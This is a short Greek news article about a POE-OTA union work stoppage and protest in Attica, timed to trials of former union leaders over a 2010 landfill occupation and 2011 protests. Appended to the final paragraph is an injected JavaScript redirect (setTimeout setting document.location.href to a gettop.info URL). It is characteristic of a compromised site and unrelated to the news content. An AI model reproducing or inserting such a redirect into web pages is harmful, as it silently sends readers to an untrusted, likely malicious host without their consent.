Παναττική στάση εργασίας της ΠΟΕ – ΟΤΑ

0
6

 

Προκειμένου να διευκολυνθούν συνδικαλιστικά στελέχη και εργαζόμενοι στην τοπική αυτοδιοίκηση να παρευρεθούν σε δίκες της διοίκησης της ΠΟΕ-ΟΤΑ, προκηρύχθηκε παναττική στάση εργασίας από τις 11:00 έως τη λήξη της πρωινής βάρδιας.

Επιπλέον, θα γίνει συγκέντρωση διαμαρτυρίας στις 12 το μεσημέρι έξω από το κτίριο 8 των Δικαστηρίων της πρώην Σχολής Ευελπίδων, όπου θα εκδικαστούν οι υποθέσεις. Στο πλευρό της ΠΟΕ-ΟΤΑ τάσσεται και η ΑΔΕΔΥ.

Οι υποθέσεις που εκδικάζονται αφορά αρχικά τον τέως πρόεδρο Θέμη Μπαλασόπουλο και τα υπόλοιπα μέλη της Εκτελεστικής Επιτροπής του 2010 που κατηγορούνται για παράνομη είσοδο και «διατάραξη της ομαλής διεξαγωγής της υπηρεσίας» στον ΧΥΤΑ Φυλής, στις 6 και 7 Μαρτίου του 2010, την περίοδο εφαρμογής του πρώτου Μνημονίου. Η δίκη διεξάγεται στο Β’ Μονομελές Πλημμελειοδικείο Αθηνών.

Ακόμη, από το Α’ Μονομελές Πλημμελειοδικείο Αθηνών, θα δικαστεί το 35μελές Γενικό Συμβούλιο με την κατηγορία της ρύπανσης περιβάλλοντος για τις κινητοποιήσεις του κλάδου τον Νοέμβριο του 2011. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here